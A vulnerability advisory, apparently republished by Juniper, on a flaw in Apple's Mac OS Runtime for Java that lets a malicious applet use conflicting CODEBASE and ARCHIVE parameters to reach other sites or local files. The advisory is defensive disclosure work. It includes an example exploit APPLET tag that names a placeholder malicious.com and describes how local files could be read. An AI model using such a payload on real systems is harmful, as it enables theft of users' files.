Title: Apple Macintosh MRJ Unauthorized File Access Vulnerability
Severity: MODERATE
Description:
A vulnerability exists in certain versions of the Mac OS Runtime for Java (MRJ). This Java execution system is a standard component of all recent MacOS versions. In addition, certain third-party Macintosh web browsers which use MRJ, including Internet Explorer 4.5 and 5, Netscape 6, iCab and others, are vulnerable.
The MRJ fails to properly enforce the security controls of the Java runtime environment when the values of the ARCHIVE parameter and the CODEBASE parameter conflict. This may allow a malicious Java applet downloaded from a website to access the local filesystem or unauthorized websites when executed.
The ARCHIVE parameter is used in HTML to designate information used in loading a JAVA applet. If an applet is kept at a separate URL from the HTML document which loads it, the CODEBASE parameter is used to specify the name of the .class file and its URL. As a security feature, the MRJ restricts what the applet can access -- it can only access files from the server specified in either the ARCHIVE or CODEBASE parameters.
This security feature is flawed in the situation where the CODEBASE and ARCHIVE parameters are both set. When this is the case, the applet can access files at either locations.
In the following example, the use of the APPLET parameter implies that "Test.jar" is in the same directory as the HTML file, and is to be loaded from this location. If, however, the two parameters are combined,
<APPLET CODE="Test"
CODEBASE="http://www.victim.com/"
ARCHIVE="http://www.malicious.com/exploit.jar">
the applet would then be able to access files at victim.com, despite its being downloaded from malicious.com, bypassing security restrictions.
By specifying CODEBASE="http:///", files on the users local machine can be accessed by the applet. This could lead to files being stolen by a malicious applet and uploaded to the rogue server.
Properly exploited, this vulnerability can allow an attacker to further compromise the security of the affected host.
Note that in addition to the current (2.2.3) version, previous MRJ versions, and products which use them, may also be vulnerable.
It was reported to SecurityFocus by Dennis E. Mateik . <Dennis.Mateik@honeywell-tsi.com> that this vulneability was not found on an installation running of Netscape 4.61 on Mac OS 9.0.4.
Affected Products:
- Alexander Clauss & iCab Company iCab 2.0.0pre
- Apple Mac OS 7 7.0.0
- Apple Mac OS 8 8.0.0
- Apple Mac OS 9 9.0.0
- Apple Macintosh Runtime for Java 2.2.3
- Microsoft Internet Explorer Macintosh Edition 4.5.0
- Microsoft Internet Explorer Macintosh Edition 4.5.0MRJ 2.1.4
- Microsoft Internet Explorer Macintosh Edition 4.5.0MRJ 2.2
- Microsoft Internet Explorer Macintosh Edition 4.5.0Microsoft VM
- Microsoft Internet Explorer Macintosh Edition 5.0.0
- Netscape Netscape 6.0.0 Mac
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
